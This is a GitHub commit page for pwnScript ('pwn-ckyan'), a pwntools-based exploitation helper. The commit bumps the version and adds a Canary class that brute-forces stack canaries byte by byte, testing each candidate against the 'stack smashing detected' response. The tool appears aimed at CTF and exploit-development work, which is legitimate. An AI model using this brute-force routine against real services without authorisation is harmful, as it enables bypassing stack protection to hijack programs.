-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Added blasting to canary and fix error
- Loading branch information
1 parent
8cce7cc
commit 3f60caf
Showing
9 changed files
with
165 additions
and
10 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,7 +1,7 @@ | ||
Metadata-Version: 2.1 | ||
Name: pwn-ckyan | ||
Version: 2.1.4 | ||
Summary: pwnScript | ||
Version: 2.1.5 | ||
Summary: pwnScript is a tools for exploiting vuln in ELF files. | ||
Home-page: https://github.com/c0mentropy/ckyan.pwnScript | ||
Author: Comentropy Ckyan | ||
Author-email: [email protected] | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -5,3 +5,4 @@ | |
from .ae64_opcode import * | ||
from .stack import * | ||
from .awd import * | ||
from .canary import * |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -11,7 +11,7 @@ | |
| (__| <| |_| | (_| | | | |_| |_) \ V V /| | | |___) | (__| | | | |_) | |_ | ||
\___|_|\_\\__, |\__,_|_| |_(_) .__/ \_/\_/ |_| |_|____/ \___|_| |_| .__/ \__| | ||
|___/ |_| |_| | ||
PwnScript version: 2.1.4""" + "\n\n" | ||
PwnScript version: 2.1.5""" + "\n\n" | ||
|
||
|
||
class CliParser: | ||
|
@@ -27,7 +27,7 @@ def __init__(self): | |
|
||
def set_parse_arguments(self): | ||
|
||
VERSION = "PwnScript: version 2.1.4\n" \ | ||
VERSION = "PwnScript: version 2.1.5\n" \ | ||
"Author: Comentropy Ckyan\n" \ | ||
"Email: [email protected]\n" \ | ||
"GitHub: https://github.com/c0mentropy/ckyan.pwnScript\n" | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,55 @@ | ||
from pwn import p8 | ||
from ..misc import r, ru, rp, s, sl, uu64, log_canary | ||
from ..log4ck import debug | ||
|
||
|
||
class Canary: | ||
def __init__(self): | ||
self.value: bytes = b"" | ||
self.padding = 0 | ||
|
||
self.send_after_str = b'' | ||
self.stack_overflow_str = b'*** stack smashing detected ***: terminated' | ||
|
||
def set_padding(self, padding: int): | ||
self.padding = padding | ||
|
||
def find_full_canary(self, padding: int = 0, send_after_str: bytes = b'', stack_overflow_str: bytes = b'***', | ||
length: int = 8, initial_canary: bytes = b'\x00', recv_length: int = 0, | ||
is_line: bool = False) -> bytes: | ||
|
||
self.padding = padding | ||
self.send_after_str = send_after_str | ||
self.stack_overflow_str = stack_overflow_str | ||
|
||
canary = initial_canary | ||
for index in range(1, length): # We start from 1 since we have the initial 0 byte | ||
canary = self._find_canary_byte(canary, recv_length, is_line) | ||
debug(f"Current canary: {canary}") | ||
|
||
self.value = canary | ||
log_canary(uu64(canary)) | ||
|
||
return self.value | ||
|
||
def _find_canary_byte(self, current_canary: bytes, recv_length: int, is_line: bool): | ||
|
||
for canary_byte_i in range(0xff): | ||
|
||
attempt_canary = current_canary + p8(canary_byte_i) | ||
|
||
pad = b'a' * self.padding + attempt_canary | ||
|
||
if is_line: | ||
ru(self.send_after_str) | ||
sl(pad) | ||
else: | ||
ru(self.send_after_str) | ||
s(pad) | ||
|
||
if rp(lambda x: self.stack_overflow_str in x) != b'': | ||
continue # Incorrect byte, try the next one | ||
else: | ||
return attempt_canary # Found correct byte | ||
|
||
raise ValueError("Could not find a valid byte") # If no valid byte is found |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,10 +1,10 @@ | ||
from setuptools import setup, find_packages | ||
setup( | ||
name = 'pwn-ckyan', | ||
version = '2.1.4', | ||
version = '2.1.5', | ||
author = 'Comentropy Ckyan', | ||
author_email = "[email protected]", | ||
description = "pwnScript", | ||
description = "pwnScript is a tools for exploiting vuln in ELF files.", | ||
packages=find_packages(), | ||
url="https://github.com/c0mentropy/ckyan.pwnScript", | ||
license='GPL-3.0', | ||
|